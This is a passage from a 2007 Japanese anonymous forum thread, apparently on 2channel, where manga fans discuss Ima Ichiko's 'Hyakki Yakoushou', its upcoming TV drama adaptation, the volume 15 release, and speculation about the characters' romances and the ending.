青嵐は佐野史郎とか合いそうだな〜と思ってたけど、いっけいさん最高

142 :花と名無しさん:2007/01/08(月) 02:50:10 ID:???0
おれのイメージは生瀬だったたよ

143 :花と名無しさん:2007/01/08(月) 03:27:33 ID:???0
『百鬼夜行抄』ドラマ化
http://ex13.2ch.net/test/read.cgi/tvd/1166278264/l50

144 :花と名無しさん:2007/01/08(月) 11:00:57 ID:???0
文庫あわせてだけど、500万部も売れていたのか。

145 :花と名無しさん:2007/01/08(月) 11:02:34 ID:???0
印税1冊100円としても5億円……

146 :花と名無しさん:2007/01/08(月) 11:06:29 ID:???0
>>145
印税はそんなにないですよ

147 :花と名無しさん:2007/01/08(月) 11:26:57 ID:???0
やたらと文庫化がはやいから文庫のほうが売れてるんだろうな、きっと

148 :花と名無しさん:2007/01/08(月) 21:04:51 ID:???0
久しぶりに百鬼夜行抄を読み返してたら、12巻の巻頭カラーページの裏に
律のイラストと「今市子」のサインがあるのに気づきました。
当時キャンペーンか何かあったんでしょうか。
サインは直筆みたいですが、何冊かに1冊の当たりみたいなものでしょうか。

149 :花と名無しさん:2007/01/08(月) 21:17:57 ID:???0
ごめん。立ち読みしたときおれが落書きしたやつだ。

150 :花と名無しさん:2007/01/08(月) 21:20:51 ID:???0
そうですか、とてもお上手ですね。

151 :花と名無しさん:2007/01/08(月) 23:25:24 ID:???0
サイン会の余りとかじゃね?

152 :花と名無しさん:2007/01/10(水) 00:18:05 ID:???0
俺百鬼は映画向きだと思っていたので、市川崑とか崑の弟子岩井俊二あたりに撮って欲しかった。
よりによって安っぽい深夜ドラマはないだろうorz

153 :花と名無しさん:2007/01/10(水) 00:27:10 ID:???0
でも、マンガのほうはまだまだずっと続いて行くだろうし、
今回のドラマ化とは無関係に、また5〜10年後くらいに
映画化されるのを気長に期待している。

154 :花と名無しさん:2007/01/10(水) 01:04:14 ID:???O
30分ドラマで12話って、全然話進まないよなぁ…

155 :花と名無しさん:2007/01/10(水) 09:09:11 ID:???0
下手に月9でやられたりするとマンガ自体の勢いが萎えそうだけど
このくらいチンケなドラマ化なら
また何年かあとで再映像化のチャンスありそう。

156 :花と名無しさん:2007/01/10(水) 12:23:51 ID:Dcr796od0
余談ですが出版物の印税は初版で定価の一割です。
再販の場合は…忘れました。
ところで2、3年前だったか「世にも不思議な物語」で、
「僕は旅をする」がドラマ化されてましたね。
稲垣吾郎が主演で、お姉さんを捜すのが弟のほうというふうに
立場が入れ替えになっていた。

157 :花と名無しさん:2007/01/10(水) 13:27:57 ID:???0
まあ、「TRICK」だって深夜枠だったのが
成り上がったのだから、視聴率次第では
映画化その他の展開もありえるわけで。
出来に期待したいとこだね。

158 :花と名無しさん:2007/01/10(水) 16:33:15 ID:???0
>>152
>市川崑とか崑の弟子岩井俊二あたりに撮って欲しかった。

確かにあの世界観だ!

159 :花と名無しさん:2007/01/10(水) 19:07:31 ID:???O
『僕は旅をする』は何故か近親相関になってるのが嫌だったなぁ。
あと「安らかな寝顔だ。」が抜けてたのも…あの一言ってかなり重要だと思うんだけど。

160 :花と名無しさん:2007/01/10(水) 23:50:11 ID:???0
>>158
同士よw

百鬼の世界を映像化できるのは崑しかいないよ

崑なんてしらねという人は細雪をレンタルしてきなさい凄いよ

161 :花と名無しさん:2007/01/11(木) 00:19:26 ID:???0
岩井俊二は止めて欲しい

162 :花と名無しさん:2007/01/12(金) 09:18:20 ID:Rluif5Fo0
「僕は旅をする」は監督が佐藤嗣麻子さんだったよね。
あの人の監督した「動物のお医者さん」はダメダメだったけど…
原作つきって難しいんだろうな。別物としてみても面白ければいいのだけど。

163 :花と名無しさん:2007/01/12(金) 09:51:19 ID:???0
完全にドラマに乗っ取られた漫画スレ…

164 :花と名無しさん:2007/01/12(金) 10:11:56 ID:???0
ドラマスレあるものね。
【061213:ドラマ】今市子作『百鬼夜行抄』TVドラマ化、2007年2月より放送予定
ゴチャ混ぜでも楽しいけど。

165 :花と名無しさん:2007/01/12(金) 15:43:07 ID:???0
ここに書かれてるのはあくまでも漫画を読んでる人間の
ドラマへの期待・不安だと思うし、さほど気にならないな
大体の場合放送開始後は落ち着いてくから心配せんでも大丈夫だよ

166 :花と名無しさん:2007/01/12(金) 17:50:49 ID:???0
うーん、今から住み分けしとかないと、放送後はもっとひどくなるんじゃない?

167 :花と名無しさん:2007/01/12(金) 19:28:25 ID:???0
オンラインで最近読み始めたんだけど面白いね

168 :花と名無しさん:2007/01/12(金) 20:08:29 ID:???0
放送までに2chが残っていればな・・

169 :ちゃい:2007/01/13(土) 13:36:20 ID:zciEehHt0
最近「百鬼夜行抄」知って読み始めました。
面白いね。絵も綺麗で最高!こんな漫画があったなんて全然知らなかった。
ドラマ化楽しみ〜!!

170 :花と名無しさん:2007/01/13(土) 14:18:48 ID:???0
>>169
あー!私の天敵ちゃんぽいw
亡くなった猫の名前なんか使っちゃって
あーたのセンス分んない

IKUKOさんのHPでこの漫画の話盛り上がってたね
それで読み始めたのよ サンキュキュ!

171 :花と名無しさん:2007/01/13(土) 14:20:40 ID:???0
なんだこいつら

172 :花と名無しさん:2007/01/13(土) 14:24:08 ID:???0
迷子かね
169、170、巣にお帰り

173 :花と名無しさん:2007/01/13(土) 14:29:42 ID:???0
ドラマスレにだってこんなアホの子居ないぞ
どっから来たんだろうなマジでw

174 :花と名無しさん:2007/01/13(土) 15:22:24 ID:???0
>>173
妖魔

175 :花と名無しさん:2007/01/13(土) 15:33:53 ID:???0
そういや、他板でもキッツイの見かけたな。
ネットに対応した妖魔か…新しい。

176 :花と名無しさん:2007/01/13(土) 15:34:52 ID:???0
他板の痛い子・・・
アレかww

177 :花と名無しさん:2007/01/13(土) 16:16:35 ID:???0
あの…百鬼の新刊(15巻)出ましたか?

178 :花と名無しさん:2007/01/13(土) 16:28:04 ID:???0
>>177
まーだだよ
http://www.amazon.co.jp/%E7%99%BE%E9%AC%BC%E5%A4%9C%E8%A1%8C%E6%8A%84-15-%E4%BB%8A-%E5%B8%82%E5%AD%90/dp/4257905727/sr=1-1/qid=1168673262/ref=sr_1_1/250-1191724-9567426?ie=UTF8&s=books

179 :花と名無しさん:2007/01/13(土) 16:36:40 ID:???0
>>178
ありがとうございます。
出てるようだったら本屋に行こうと思ったので。

180 :花と名無しさん:2007/01/13(土) 16:37:24 ID:???0
自分で調べさせろよ。
教えると次からも聞くようになるんだから。

181 :花と名無しさん:2007/01/13(土) 16:50:51 ID:???0
>>180
教えてチャンですいません。
自分の見たところでは中旬としかなかったので。
出てないんだったら出かけるのも億劫だなって(雪の国なので)

182 :花と名無しさん:2007/01/13(土) 16:58:09 ID:???0
>>180
気にするな
俺のようなネットに棲む魔物との取引は人間には割にあわないはずだから

183 :花と名無しさん:2007/01/13(土) 16:59:19 ID:???0
それならなおさら自分で行くつもりの本屋に電話して調べなさいよ
地方によって入荷日は違うんだし、雪で遅れることもあるでしょうに

184 :花と名無しさん:2007/01/13(土) 20:11:18 ID:???0
自分で調べてそれをこのスレに書き込むのが模範的よね

185 :花と名無しさん:2007/01/14(日) 14:04:41 ID:???0
出てたらここに感想や質問を書き込んでる人がいるってw

186 :花と名無しさん:2007/01/14(日) 16:14:08 ID:???0
いいじゃん。ネットカキコが楽しいんだよ。
一人検索で終わってしまうと(終わるんだなこれが)しょーもないっしょー。

187 :花と名無しさん:2007/01/14(日) 16:16:33 ID:???0
いいじゃん。ネットカキコが楽しいんだよ。
一人検索で終わってしまうと(終わるんだなこれが)しょーもないっしょー。

188 :花と名無しさん:2007/01/14(日) 16:25:22 ID:???0
帰れ

189 :花と名無しさん:2007/01/14(日) 16:28:06 ID:???0
>>186-187
幾分>>169-170のご両人と同じ臭いを感じたよ

190 :花と名無しさん:2007/01/14(日) 17:08:40 ID:???0
>>185->>187
の流れがよくわからない

191 :花と名無しさん:2007/01/14(日) 17:26:48 ID:???0
>>185->>187
>>185-187

って書いてくんないと困るお

192 :190:2007/01/14(日) 17:50:26 ID:???0
うぉうスマソ。

15巻まであと少し…wktk

193 :花と名無しさん:2007/01/14(日) 17:55:32 ID:???0
>>188〜192
ゴメン!すみませんでした。
186・187は、うっかり重複書き込みになったです。言葉不足もあり。

>>177はきっと今さんの漫画が好きなので、だから不安になって、みんなに聞いたんでしょ。
と思ったわけです。
今後は、漫画のことだけにしますね。

194 :花と名無しさん:2007/01/14(日) 18:12:16 ID:???0
帰りたまえよ

195 :花と名無しさん:2007/01/14(日) 20:34:03 ID:7amb1K/I0
うちの近所の本屋はいつも3巻&6巻だけ売ってないんだけどなんで?

196 :花と名無しさん:2007/01/14(日) 21:34:56 ID:???0
分からん

197 :花と名無しさん:2007/01/14(日) 21:42:35 ID:???0
>>195
3巻と6巻だけ売れて、あとは補充されてないってこと?

198 :花と名無しさん:2007/01/14(日) 21:45:24 ID:???0
どうでもいい話じゃん

199 :花と名無しさん:2007/01/14(日) 23:12:07 ID:???0
それこそまさに本屋に聞くしかないと思うが。

200 :花と名無しさん:2007/01/14(日) 23:40:50 ID:XC15v9CdO
200

201 :花と名無しさん:2007/01/15(月) 10:56:12 ID:bZ/TdY1i0
電車で街まで行き、やっと3巻買えました!
でも6巻はやっぱり売ってなかったな。

202 :花と名無しさん:2007/01/15(月) 13:43:49 ID:???0
ところで15巻の表紙、律だよね?
いっしゅん晶ちゃんかと思った…まあいつもの事だけど

203 :花と名無しさん:2007/01/15(月) 18:58:45 ID:???0
ktkr!!!

204 :花と名無しさん:2007/01/15(月) 20:08:03 ID:???O
「メメント」見てたら百鬼夜行抄思い出した。

205 :花と名無しさん:2007/01/15(月) 20:17:49 ID:???0
メメントで?

206 :花と名無しさん:2007/01/15(月) 20:45:58 ID:???0
百鬼夜尿症

207 :花と名無しさん:2007/01/15(月) 20:48:52 ID:???0
メメント観たことあるけど、百鬼と似てるところとかあったっけ?

208 :花と名無しさん:2007/01/15(月) 20:52:41 ID:???0
主人公がワタワタしてるうちに話が終わる(はじまる)ところ?

209 :花と名無しさん:2007/01/15(月) 21:46:49 ID:???0
中心人物が自分の立ち位置を理解してないところとか?

210 :花と名無しさん:2007/01/15(月) 23:21:46 ID:???0
祥伝社という出版社から出てる
「夢幻アンソロジー4 幻想円舞曲」に
16ページ読みきり
ってのは既出?
前スレも一応読んでたんだけど出てたらスマン。

211 :花と名無しさん:2007/01/16(火) 07:23:39 ID:???0
うん。知ってた

212 :花と名無しさん:2007/01/17(水) 12:55:10 ID:???0
百鬼のドラマ
晶ちゃんはあびる優が良いな!

213 :花と名無しさん:2007/01/17(水) 13:28:28 ID:???0
万引き女はヤダ。
もっと賢い感じ

214 :花と名無しさん:2007/01/17(水) 15:56:56 ID:???0
それ以前にキャスティングはもう決まってるだろw

215 :花と名無しさん:2007/01/17(水) 18:08:02 ID:???O
晶ちゃんは出ないんじゃなかったっけ

216 :花と名無しさん:2007/01/17(水) 19:56:58 ID:???0
まとめてドラマスレ逝け

217 :花と名無しさん:2007/01/17(水) 20:12:09 ID:???O
まだ先だろうけど、百鬼はどんなラストを迎えるのかな。
一話完結の話って最終回が難しいよね…
キャラクターの時間は動いてるから、誰かが亡くなったり
青嵐・尾白・尾黒が居なくなったりするんだろうか。
晶ちゃんと三郎さんも気になるし。

218 :花と名無しさん:2007/01/17(水) 20:54:49 ID:???0
>>217
一度いなくなって戻ってきてエンドな気がする。
未来の話ってあったよね。あれより前には終わってそう。

219 :花と名無しさん:2007/01/17(水) 22:49:28 ID:???0
まあ飯島家のちょっと奇妙な日常はこれからも続くけど、
漫画ではここでお開き、という終わり方になるんだろうな。

220 :花と名無しさん:2007/01/17(水) 23:59:02 ID:???0
律と司がくっついて終わりとか

221 :花と名無しさん:2007/01/18(木) 00:03:33 ID:???0
律と司はくっつかないと思う
それより晶ちゃんを早く幸せにしてあげて欲しいと思う

222 :花と名無しさん:2007/01/18(木) 00:06:24 ID:???0
>>221
雌鶏になれば幸せだな

223 :花と名無しさん:2007/01/18(木) 00:36:02 ID:???0
>>222
仲良く水炊きにでもするか
それとも卵も使って親子丼にするか

224 :花と名無しさん:2007/01/18(木) 00:51:22 ID:???0
律と司がくっつかないなら、律の恋人(候補)も最後まで出ないかな。
あの家を律と恋人(候補)が守ってく未来を感じさせて
最終回になると自分は予想してたんだけど。
じゃないと、律もお爺ちゃんが一度は覚悟した独り身生活・・・

225 :花と名無しさん:2007/01/18(木) 01:18:13 ID:???0
ドラマの影響で律役のファンの厨がわきそうで今から怖い。

律の相手は最後までにでてきてほしいな。
物語の中の時間はあまり経たせないでほしいかも

226 :花と名無しさん:2007/01/18(木) 01:43:05 ID:???0
いきなり孫の代になっていたりして。
おじいちゃん(律)の初七日の日、
女の子の格好をさせられてお蔵へ閉じこめられる孫息子…

227 :花と名無しさん:2007/01/18(木) 01:54:48 ID:???0
律の子どもや孫を子守りする尾白と尾黒がみたいんだけど、
律はやはり子どもには妖魔は近づけないようにするかな

228 :花と名無しさん:2007/01/18(木) 06:50:59 ID:???0
妖魔よりも開さんが一番要注意かも

229 :花と名無しさん:2007/01/18(木) 07:30:37 ID:???0
恋人じゃなくても、律の事を想う女の子って登場しないね
司や晶はモテモテなのに

230 :花と名無しさん:2007/01/18(木) 08:48:22 ID:???0
いやいや

231 :花と名無しさん:2007/01/18(木) 09:46:30 ID:???0
律の恋人候補はフシさんじゃないの?
律の事好きっぽかったし、律も好きっぽかった。

あの話読んで律×司エンドは無いと思った。
司ちゃんが誰かと結婚してもお互い協力し合っていく……
みたいな事言ってたし

232 :花と名無しさん:2007/01/18(木) 09:50:46 ID:???0
フシさんって単行本に登場してる?
まだだったら楽しみだ。・・・自分、ネムキはたまにしかチェックしてないんで。
隔月だと忘れるんだよね。

233 :花と名無しさん:2007/01/18(木) 09:59:52 ID:???0
>>232
登場してる。

234 :花と名無しさん:2007/01/18(木) 10:47:22 ID:???0
「水辺の暗い道」の遠野真理子だね
「怖がりで 弱音を吐きあえる こんな相手が側にいてくれたら」とか
「ふしさんでも就職も結婚もできるのよ」とかそれっぽい描写ある

ただ、そうすると律は婿養子になるのか??

235 :花と名無しさん:2007/01/18(木) 10:52:42 ID:???0
その子より前にも律を思って司不倫疑惑とか吹聴した奴もいたね

236 :花と名無しさん:2007/01/18(木) 11:14:13 ID:???0
ふしさんの話は確実にフラグ立ったとオモタ

237 :花と名無しさん:2007/01/18(木) 11:23:31 ID:???0
>>233
d。すっかり忘れてました。orz
司ちゃんに彼氏が出来た頃に登場してたね、そういえば。
律というと、「律に気がありそうな子登場」→「単に相談事ある」or「妖魔」or「男」
の方が印象が濃くて、忘却してました・・・

238 :花と名無しさん:2007/01/18(木) 12:22:54 ID:???0
典型的な少年漫画なら、赤間を倒して最終回なんだろうけど、
別に赤間は律の敵として描いてないしなあ。すごく厄介な存在ではあるけど。

そういえば、赤間はなぜ司を苦手とするんだろう。

239 :花と名無しさん:2007/01/18(木) 13:00:25 ID:???0
司ちゃんは赤間の目を潰したりしてるから

240 :花と名無しさん:2007/01/18(木) 13:28:00 ID:???0
それ以前に合わないんだろう

241 :花と名無しさん:2007/01/18(木) 13:31:48 ID:???0
痴漢に間違われたりしてたし…

242 :花と名無しさん:2007/01/18(木) 13:33:59 ID:???0
怖いのを見てもそれを認めず現実のものとして処理してしまうからなあ

243 :花と名無しさん:2007/01/18(木) 13:40:28 ID:???0
>怖いのを見てもそれを認めず現実のものとして処理してしまうからなあ

絹さんと共通してるね。でも、絹さんのが鈍感かな。
絹さんや八重さん位に鈍感だと赤間の方も気にしないのか。

244 :花と名無しさん:2007/01/18(木) 13:46:43 ID:???0
絹さんは見えても見なかった事として処理してるから
反応しちゃってる分、司ちゃんの方が危険。

まったく見えない八重さん最強

245 :花と名無しさん:2007/01/18(木) 13:52:30 ID:???0
晶ちゃんは律と同じで認識してるもんね。
司ちゃんは潮に近いんだろうか。

246 :花と名無しさん:2007/01/18(木) 17:24:49 ID:???0
でも最近の描写だと、司も普通に見えてるし認識しているっぽい。
段々耐性がついてきたみたいだ。

247 :花と名無しさん:2007/01/18(木) 20:36:27 ID:???0
ただフシさんは東京へは行けないんじゃなかったっけ
登場した時点では嫁候補だと思ったけど
地元で結婚も就職もできるけど「東京へはいけない」と言ってたから
飯島家は継げないんじゃないかと思って候補ではないと勝手に思ったよ

248 :花と名無しさん:2007/01/18(木) 21:26:24 ID:???0
律がフシさんとこに婿入りして、晶ちゃんが飯嶋の家を守るってのもありなんじゃないか。

249 :花と名無しさん:2007/01/18(木) 21:35:28 ID:???0
開おじさんがいるじゃないか!律が婿入りの件でひと騒動→ふらりと帰ってくる開おじさん。

250 :花と名無しさん:2007/01/18(木) 22:34:03 ID:/+zsmjHe0
フシさんの件は、どう考えても一部の人が妄想してるだけだと思うが。
フシさん→律の描写はあったけど、律は何とも思ってないわけだし。

251 :花と名無しさん:2007/01/18(木) 22:34:16 ID:???0
ageたすまん

252 :花と名無しさん:2007/01/18(木) 23:06:25 ID:???0
フシさんが司ちゃん殺すかと思ったの思い出した

253 :花と名無しさん:2007/01/18(木) 23:08:50 ID:???0
普通に律と司がハッピーエンドでしょ!

254 :花と名無しさん:2007/01/18(木) 23:18:06 ID:???0
人物相関図が欲しい。

255 :花と名無しさん:2007/01/18(木) 23:52:02 ID:???0
>253
律と司なら、gdgdずるずるエンドでもイイ!!

256 :花と名無しさん:2007/01/19(金) 00:13:19 ID:???0
>250
同意。

257 :花と名無しさん:2007/01/19(金) 00:45:42 ID:???0
ふしさんは、律のこと好きそうな描写があったから途中までは
「お相手登場?」と思ったけど、最後まで読んだら違うよね。
あの話では司と律がくっつくのもなさそうっていうのがわかるからちょっと複雑だったわ。

258 :花と名無しさん:2007/01/19(金) 00:52:45 ID:???0
くっつくくっつかないってのは晶ちゃん達にまかせとけや

259 :花と名無しさん:2007/01/19(金) 01:55:00 ID:???0
従兄姉もいるし大丈夫だとは思うけど、
万一、飯島家の血筋が途絶えて、あの屋敷が手放されたらと思うと、ちょっと恐いな・・・
あ、でも八重子さん並に強い人に購入してもらえばいいのかw

でも、ほんとに最終回あるとしたらどうなるんだろうね。律や開さんに適した職業見つかるのかな。

260 :花と名無しさん:2007/01/19(金) 15:33:39 ID:???0
律と司がくっつくってのは、しつこいくらい無いって書かれてる気がするよ。本編で。

261 :花と名無しさん:2007/01/19(金) 15:39:41 ID:???0
司ちゃんの本家嫁入り話は、なんといっても父・覚が絶対反対するだろう

262 :花と名無しさん:2007/01/19(金) 17:43:36 ID:???O
本編で書かれてるって、律がよく『司ちゃんとそうなることはありえない』って言ってるのとか?
自分はあぁいう律の『本当に気がない感じ』が逆にくっつく
フラグ(というほどのものじゃないけど)かと、なんとなく思ってた。
なんだかんだ彼氏を気にしたりしてるのを含め。確かにおじさんは絶対許さなそうだけど…。

263 :花と名無しさん:2007/01/19(金) 18:28:20 ID:???0
恋愛意識や可能性の否定なんかは
ツンデレ的な、そうはいいつつやっぱり気になるフラグのときもあれば
本当に否定だったってときもあるから
最終回まで行かないと分からないだろうね

264 :花と名無しさん:2007/01/19(金) 18:39:10 ID:???0
というか、律と司がくっつくと思える人が判らない。
仲のいい、互いに特殊性を理解し合える従姉妹同士ってあんなもんだし。

265 :花と名無しさん:2007/01/19(金) 19:07:04 ID:???0
フシさんの話で司エンドは無いと思った。

恋愛感情は無いけど、お互いに大事な存在で、
だから彼氏ができたらどんな奴か気になるってだけだなと。

266 :花と名無しさん:2007/01/19(金) 23:28:35 ID:???0
そういえば、まだ登場してない従兄弟がいるんだよね。
洸さんの子ども。男か女かわからんが、出てくるんだろうか。

267 :花と名無しさん:2007/01/20(土) 17:37:01 ID:???0
>264
うん、イトコ同士(作品名じゃないよ)って時点でまずない。大切な家族みたいなものでは。
律はまだしも、司ちゃんはわりとモテるし出会いもあるのに、何故年下の従弟にいかにゃならんのかと・・

268 :花と名無しさん:2007/01/21(日) 12:11:29 ID:???0
でも、いとこの話を書くのは伏線かと思ってた。
あの絹さんが望んでるってのも大きい。

ただ、司ちゃんは律より妖魔の方が好きそうなんだよねw
お父さん=青嵐のファンなんだっけ。彼氏よりこっちのほうが本命っぽい。

269 :花と名無しさん:2007/01/21(日) 13:35:40 ID:???0
フシさんよりはまだ作中で律の司への気持ちは描かれてると思う。
作品としてはの話ね。従兄弟だからとかそういうの関係なく。
(作中で否定されてないのに、読者が従兄弟がいやだって理由で否定するのも変な話だが)

個人的には、八重子さんみたいな人が突然現れて律とくっつきそうな気もするが。
でも考えてみるとお祖父ちゃんと八重子さんの恋愛は結構じっくり描かれてるなあ。
そうすると律もそこそこ時間かけるかな?

270 :花と名無しさん:2007/01/21(日) 15:10:09 ID:???0
百鬼は恋愛物じゃないから
律の恋愛を時間かけて描く理由がない

271 :花と名無しさん:2007/01/21(日) 16:11:24 ID:???0
律が誰かと結婚したら、尾白・尾黒からは何て呼ばれるんだろう
律がパパになっても「若」のままかなあ

272 :花と名無しさん:2007/01/21(日) 16:24:20 ID:???0
うざい

273 :花と名無しさん:2007/01/21(日) 16:43:22 ID:???0
確かにちょっとな

274 :花と名無しさん:2007/01/21(日) 17:14:42 ID:???0
ドラマ話に比べりゃ大分マシだと思うが

275 :花と名無しさん:2007/01/21(日) 18:43:27 ID:???0
しかし恋話ループしすぎ
妄想は日記にて

276 :花と名無しさん:2007/01/21(日) 19:10:18 ID:???0
うざいなら他の話振ればいいのに

277 :花と名無しさん:2007/01/21(日) 20:16:38 ID:???0
力技すぎるよな

278 :花と名無しさん:2007/01/21(日) 20:56:59 ID:???0
売ってねー!

朝日ソノラマの中旬っていつなの???

279 :花と名無しさん:2007/01/21(日) 21:23:04 ID:???O
>>278
出版社違うけど春発売って言って数年後の冬に出た漫画もあるしな……

280 :花と名無しさん:2007/01/21(日) 21:45:23 ID:???0
アマゾンで23日になってたよ

281 :花と名無しさん:2007/01/22(月) 02:37:43 ID:???0
23日は下旬だよー

282 :花と名無しさん:2007/01/22(月) 08:43:14 ID:???O
そうだ、下旬だ!
でもまぁ明日って事は今日には誰かgetって事ね
お知らせよろ!

283 :花と名無しさん:2007/01/22(月) 17:00:30 ID:???0
買ってきたよ!
ダメモトで地元の書店数軒回ったら、一軒だけ平積みされてた。
コミクス待ちなので、読むのが楽しみです。
その前に家事を済ませておかなきゃな。

284 :花と名無しさん:2007/01/22(月) 18:56:06 ID:???0
ダメモトで買いに行ってみたら「15巻24日発売」って書かれてた・・

285 :花と名無しさん:2007/01/22(月) 19:06:24 ID:???O
地元にはなかったけど用事で東京行ったら売ってた。さすがw

置き方も、地元だと大版なんか最新刊がちょこっとあるだけだし文庫も棚に一冊ずつさしてあるだけなのに
東京行くと大判も文庫も全巻平積みなんだよな…

286 :花と名無しさん:2007/01/22(月) 19:19:08 ID:???0
書店の大きさと傾向によるよ。
東京だけど地元のオサレな書店は洋書ばっかで漫画少ない。
隣の駅まで買いにいってる

287 :花と名無しさん:2007/01/22(月) 20:56:27 ID:???0
発売日が決まってるなら早売りする関西(チョト田舎)だけど
売ってなかったわ…明日か…

288 :花と名無しさん:2007/01/22(月) 21:10:58 ID:???0
三話目「緋い糸」の表紙で、尾白黒が遊んでるのは物の怪カルタ?


289 :花と名無しさん:2007/01/22(月) 22:36:21 ID:???O
15巻妙におもしろい。中期の雰囲気が戻ってきた気が。
コメディ部分(?)がちょっと強めな感じもよかった。

290 :花と名無しさん:2007/01/22(月) 23:25:00 ID:???0
金足りなくて買えなかった…

291 :花と名無しさん:2007/01/23(火) 00:09:51 ID:???O
15巻確かに良かった。でも最後の話は個人的にはちょっと分かりづらかったから、再読しようと思う。
久々に司ちゃんが出て来たのは嬉しかったけど、もっと律と組ませて欲しいなー。
すっかり開さんにお株を奪われてしまったようだ(変な意味ではなく)。
しかしドラマ化か…キツいなぁ…。

292 :花と名無しさん:2007/01/23(火) 00:34:02 ID:???0
幸か不幸か、私の地域では放送ないみたいorz
ドラマ板でポスター見てきたけど、ちょっと微妙だったわ。

293 :花と名無しさん:2007/01/23(火) 00:58:46 ID:???0
15巻買ったよ。
帯にドラマ化って書いてあって微妙な気分に…

近藤くんいいキャラだね。
律にいいお友達ができてよかったよ( ´∀`)
絵がもうちょっと丁寧だったらよかったんだけど。

294 :花と名無しさん:2007/01/23(火) 01:50:41 ID:???O
近藤君いいね。個人的に絵はきれいだと思った。
それより字が…くせまで直せなんて言わないけど、明らかに雑で読めないのはやめてー

295 :花と名無しさん:2007/01/23(火) 02:03:24 ID:???0
近藤君って、前から友だちとしてちょくちょく出てきてた子だよね?
それとも、より積極的に友だち認定されたのかな?
(前は律が名前忘れたりとか、可哀想な扱いだったから)

296 :花と名無しさん:2007/01/23(火) 02:24:03 ID:???0
夏希はあの後殺されちゃったの?

297 :花と名無しさん:2007/01/23(火) 05:35:56 ID:???0
大学入ってから律の人間関係が広くなったのは嬉しい
親しくなった近藤くんに魔の手が伸びませんように・・・ナムナム
初期蝸牛編が頭にあると、ネガな想像がよぎってしまう

298 :花と名無しさん:2007/01/23(火) 08:09:26 ID:???0
魔の手は赤間の手だしな 司が近くにいればだいじょうぶだろう

299 :花と名無しさん:2007/01/23(火) 14:04:27 ID:???0
近藤くんもう立派な友達だねw
出番多かったなぁ。律の家をでてまた戻ってって、何やってたんだろう?
三郎さんが鶏になるところまでは収録されなかったのか。ネタバレ済みのコミックス派なので待ち遠しい。

300 :花と名無しさん:2007/01/23(火) 14:44:33 ID:???0
近藤くんは八重さん系なので律と友達になっても大丈夫そうだね。
尾白黒からも好かれてるしw
三郎さんって鶏になっちゃうのか・・・
白蛇の瑞菜さんとか過去作品で妖魔と人間のカポーもあったというのに、
晶ちゃんは作者に苦難の道を歩まされてるなぁ。

301 :花と名無しさん:2007/01/23(火) 15:14:34 ID:???0
夜のうちは人間体で、朝日とともに鶏にもどる、とかならいいかも。

302 :花と名無しさん:2007/01/23(火) 15:26:11 ID:???0
尾白黒はめちゃくちゃかわいいな
あれを実写で表現するのは無理だな
8巻に出てくる犬の妖怪マルもかわいい

303 :花と名無しさん:2007/01/23(火) 15:28:17 ID:???0
レディホークみたいだな。

304 :303:2007/01/23(火) 15:28:51 ID:???0
おっと。303は
>>301
ね。

305 :花と名無しさん:2007/01/23(火) 17:06:03 ID:???0
>>296
律の言葉通りまた難を逃れたんじゃないかな。
夏希が死んでたら、友人の近藤くんと三井真理子にも悲壮感あると思うから。

>>302
自分は芳一が好きだw

306 :花と名無しさん:2007/01/23(火) 17:25:58 ID:???O
佐藤さんのお母さんが可哀相すぎるw
あの顔怖いよ((゜Д゜;)))

307 :花と名無しさん:2007/01/23(火) 19:29:36 ID:???0
>>300
>尾白黒好かれる
ってポイントでかいよなw
近藤もっと出てくれ近藤

308 :花と名無しさん:2007/01/23(火) 19:52:43 ID:???0
タートル関口と司を間違えてたってことは尾白黒は目が悪いんだね
・・・鳥目だから?

>>296
ストーカー兄貴が身代わりになったと予想
でも、生き延びたor殺されたどちらの解釈も成り立つね

309 :花と名無しさん:2007/01/23(火) 21:11:02 ID:???O
仕事終わらないよ
まだ買ってないよ・・・
今日の夜には買うぞ!
夜更かししてしまいそう

310 :花と名無しさん:2007/01/23(火) 21:47:01 ID:???0
>>308
> ストーカー兄貴が身代わりになったと予想
それはかなり無理があるような…。
ラストの文章はああだけど、ポーズは完全にメッタ打ちにされてるポーズだったし。

311 :花と名無しさん:2007/01/23(火) 22:14:10 ID:???0
鬼の面こわいー
あれ、まだ話しつづくの?て思ってたら不意打ち喰らったよー

312 :花と名無しさん:2007/01/23(火) 23:05:49 ID:???0
やっと入手出来た。

確かに15巻は読み応えあって満足だった〜
話も分かり易くて今回は助かったw
開さんが沢山登場してた割には印象薄かったのは気のせい?
おばあちゃんの心配にはワロタ

三郎は鶏だったんじゃ???
箱庭では石???
訳分からない…う〜む…

313 :花と名無しさん:2007/01/24(水) 00:18:49 ID:???O
>>225
遅レスごめん。細田のファンてそんなに痛いかな?
自分は冒険チアーズの頃からファンで今回律に決まって凄く嬉しいんだけど
まだドラマ始まってもいないのに痛いファンが云々書かれると辛い。
痛くない、普通のファンもいますよーと主張したい。
スレ違い申し訳ない。漫画も俳優もドラマも好きなんだよ…。

314 :花と名無しさん:2007/01/24(水) 00:27:57 ID:???0
多分ブログのコメがとても若々しかったからだと思うww
まぁ注目されるて事はいろんな人が百鬼に目を向けたりこのスレ見たりするんだろうし
多分厨も普通の人も増えるんじゃないかなぁ

そこまで注目されずに終わったりして…

315 :花と名無しさん:2007/01/24(水) 01:12:08 ID:???0
>>296
あの律のモノローグからすると生き延びた感じがする。
彼女の変わりに、佐藤家の誰かが犠牲になったんじゃないかな。

316 :花と名無しさん:2007/01/24(水) 01:12:53 ID:???0
細田ってNHKの「君の知らないところで世界は動く」ってドラマの主役やったり
少女漫画の「ハツカレ」のネットドラマのヒロインの相手役やったり
その他アーティストのPV出たり映画出たりと結構若手の間では
注目されつつある俳優なんだよね。
自分も何回か会ったことあるけど、生の雰囲気は律に似てる。
これがドラマで生かされてくれる事を祈るよ。

317 :花と名無しさん:2007/01/24(水) 01:22:33 ID:???0
読んだ!
鬼の面の話、ちょっとまだ把握しきれないorz

般若の面の男=中年の方の近藤の家に残ってた憎悪の念?+夏希・三井についていた悪霊
合コン前に夏希の事を聞いてきた男=近藤中年本人
ファミレスの男=夏希・三井についていた悪霊(三井の無意識の憎悪)??
三井家の前で張ってたコートの男=ストー王佐藤兄
であってる?
あと般若の面の男が何故コートを着ていたのがわかんないんだけど…
佐藤兄(の生き霊?)だとしてもまだ夏希と知り合ってないよね?

で、コート+カメラで夏希をストーキングしていた佐藤兄を
自分をスパイしているカメラ小僧と勘違いして、さらに勘違いして佐藤母を殺したってことなんだよね?

318 :花と名無しさん:2007/01/24(水) 01:31:08 ID:???0
鬼の面はよくわからなかった…。
最初にさらっと読んだときは、律の友人近藤と中年近藤が区別がつかんかった。
